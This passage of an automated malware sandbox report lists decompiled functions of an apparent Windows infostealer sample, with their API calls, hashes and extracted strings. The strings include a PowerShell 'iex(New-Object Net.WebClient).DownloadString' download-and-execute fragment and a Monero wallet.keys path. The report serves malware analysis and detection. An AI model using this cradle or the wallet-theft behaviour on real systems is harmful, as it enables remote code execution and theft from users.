                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E72FD5
                                  Strings
                                  • ')", xrefs: 00E72F03
                                  • <, xrefs: 00E72F89
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E72F54
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E72F14
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 6fc75fe3e64e06fef30615949a8afd2f2b361c9764efd8eb6226c8154724b2fd
                                  • Instruction ID: dec9e6a426805f5378b82732c17277b12ccb09b7dc9a803fc8bcfb7fc5711314
                                  • Opcode Fuzzy Hash: 6fc75fe3e64e06fef30615949a8afd2f2b361c9764efd8eb6226c8154724b2fd
                                  • Instruction Fuzzy Hash: 60410E71D102089ADB14FFA0C8A2FEDB7B9AF50300F54A469E11A77196EF702A49CF51
                                  Function 00E74300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0173D420,00000000,00020119,?), ref: 00E74344
                                  • RegQueryValueExA.ADVAPI32(?,0173DF30,00000000,00000000,00000000,000000FF), ref: 00E74368
                                  • RegCloseKey.ADVAPI32(?), ref: 00E74372
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E74397
                                  • lstrcat.KERNEL32(?,0173DF60), ref: 00E743AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: b11fbea27fb687dacc23cd97f084747cd379d876fc95c24164d0c590d9ca371f
                                  • Instruction ID: a16351b79439c869598c0670a7910005a0ca0c0c1128a5e130d62f98dc432fcd
                                  • Opcode Fuzzy Hash: b11fbea27fb687dacc23cd97f084747cd379d876fc95c24164d0c590d9ca371f
                                  • Instruction Fuzzy Hash: 2841ADB6900108ABDB28E7A0EC46FEE737CB748300F048569B72A561C5EB7557C8CBE1
                                  Function 00EDCBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                  • String ID:
                                  • API String ID: 3136044242-0
                                  • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction ID: c256d885955f6b0382b6729dc3e2f1ab86a4c79e8fde9914f50c239f71d89984
                                  • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                  • Instruction Fuzzy Hash: D821A372D1061AAFDB229E15CC4197FBAA9EB817D8F256117FA0877310D3304D43DBA0
                                  Function 00E77F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77FC7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E77FCE
                                  • RegOpenKeyExA.ADVAPI32(80000002,0172B990,00000000,00020119,?), ref: 00E77FEE
                                  • RegQueryValueExA.ADVAPI32(?,0173D660,00000000,00000000,000000FF,000000FF), ref: 00E7800F
                                  • RegCloseKey.ADVAPI32(?), ref: 00E78022
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: d70daa425f0bd456f3ea637ef48f8ffacb43f9ab7627a1e2e47bc4c512a342a7
                                  • Instruction ID: 6f525e259b698adce4029c3e112efa4be56431444b996091d27a4fca3b3eb6d7
                                  • Opcode Fuzzy Hash: d70daa425f0bd456f3ea637ef48f8ffacb43f9ab7627a1e2e47bc4c512a342a7
                                  • Instruction Fuzzy Hash: E31191B1A84205EBE718CF84DD49FBFB7B8EB04B10F104129F629B7288D7B55944CBA1
                                  Function 00E793F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • StrStrA.SHLWAPI(0173DDE0,00000000,00000000,?,00E69F71,00000000,0173DDE0,00000000), ref: 00E793FC
                                  • lstrcpyn.KERNEL32(01137580,0173DDE0,0173DDE0,?,00E69F71,00000000,0173DDE0), ref: 00E79420
                                  • lstrlen.KERNEL32(00000000,?,00E69F71,00000000,0173DDE0), ref: 00E79437
                                  • wsprintfA.USER32 ref: 00E79457
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 3251d4ac02b9da80f434318985a3d9dc7f852b587b9b4b04b62ff6d6e342ecc7
                                  • Instruction ID: 96d7db9892f0a42c1ff75cca61f84102c5176d04fe49de56d320c2e4859f91c4
                                  • Opcode Fuzzy Hash: 3251d4ac02b9da80f434318985a3d9dc7f852b587b9b4b04b62ff6d6e342ecc7
                                  • Instruction Fuzzy Hash: 2301D2B660024CFFCB18DF98C984EAE7BB9EF44304F108258F91D97289D731AA54DB90
                                  Function 00E612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E612B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E612BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E612D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E612F5
                                  • RegCloseKey.ADVAPI32(?), ref: 00E612FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 32d5f448155507046058431973f5df7334fb86d6b1eca8d1a963e6a41ad5304c
                                  • Instruction ID: 5e80451185701c8ed30dec503df97a0313621051aa3e81ae91b9272da7a3606b
                                  • Opcode Fuzzy Hash: 32d5f448155507046058431973f5df7334fb86d6b1eca8d1a963e6a41ad5304c
                                  • Instruction Fuzzy Hash: B001E1B9A40209BFDB14DFD4DC49FAE77B9EB48701F1081A5FA15972C8D7709A40DB90
                                  Function 00E7CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 5c0beeea5281928889c9d9419dfad96b389cadaaf404bcbd660c8b888be637c2
                                  • Instruction ID: d2fada7956fd9f4946093061e081844698a8ea4b57b3ae578b0b3885f52e7bed
                                  • Opcode Fuzzy Hash: 5c0beeea5281928889c9d9419dfad96b389cadaaf404bcbd660c8b888be637c2
                                  • Instruction Fuzzy Hash: 2341E97110475C5EDB328B248D85FFBBBFC9B45708F2494ECE98EA6142D2719A44DF60
                                  Function 00E768D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E76903
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00E769C6
                                  • ExitProcess.KERNEL32 ref: 00E769F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 462aa22e21c6603b4121a640effc26fc33e0a0cffbcfeaff31bc5bd95a2b86a1
                                  • Instruction ID: 5fae1d4d9299154dbf6e069b84eb67579d7d8ad33b885cc9e1123b7d670e0bc5
                                  • Opcode Fuzzy Hash: 462aa22e21c6603b4121a640effc26fc33e0a0cffbcfeaff31bc5bd95a2b86a1
                                  • Instruction Fuzzy Hash: 7A3150F1901218ABDB18EB90DD95FDDB7B8AF54300F4091A8F21976185DF706B88CF65
                                  Function 00E78950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E80E10,00000000,?), ref: 00E789BF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E789C6
                                  • wsprintfA.USER32 ref: 00E789E0
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: dbf6cc70a43e8b09f3918528b9736f8e268085b8f9695b1ebc5b36dd55b2346a
                                  • Instruction ID: 2e55676b8746cde5d61707afbb4587d8944836129a4760f54531aab1f06ddf81
                                  • Opcode Fuzzy Hash: dbf6cc70a43e8b09f3918528b9736f8e268085b8f9695b1ebc5b36dd55b2346a
                                  • Instruction Fuzzy Hash: 2F212EB1A44204AFDB14DF94DD45FAEBBB8FB48710F108529FA19B72C8C7755940CBA0
                                  Function 00E6A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E6A098
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
